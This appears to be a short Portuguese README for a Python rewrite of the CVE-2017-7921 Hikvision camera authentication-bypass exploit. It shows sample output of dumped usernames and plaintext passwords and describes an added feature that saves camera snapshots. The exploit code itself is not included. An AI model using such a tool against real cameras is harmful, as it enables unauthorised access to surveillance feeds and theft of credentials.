
reescrita simples do CVE-2017-7921 em python por mim. apenas para fins educacionais!
reescrita simples do CVE-2017-7921 em python por mim. apenas para fins educacionais!
meio simples, não incluí verificações para coisas como IPs, e verificações avançadas para a resposta e tal. Testei em uma câmera que estou autorizado a testar (dentro da minha rede local) e parece funcionar perfeitamente.
#Exemplo de saída:
python 2017.py
found usernames: admin,defualt
admin:Pa$$W0rd
defualt:Xf07732479
Isso corresponde às credenciais que obteríamos se usássemos o mesmo exploit no "msfconsole"
[*] User Credentials Information:
-----------------------------
User:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
User:defualt | ID:2 | Role:Operator | Password: Xf07732479
#fontes detalhes reais: https://medium.com/@k3yb0ard/when-you-pay-to-sell-your-own-privacy-a-technical-deep-dive-into-cve-2017-7921-hikvision-auth-576b581f4afe
cve: https://nvd.nist.gov/vuln/detail/cve-2017-7921
#atualização
também adicionei snapshot que permite obter um snapshot de /Streaming/channels/1/picture e salvá-lo em um arquivo ip.jpg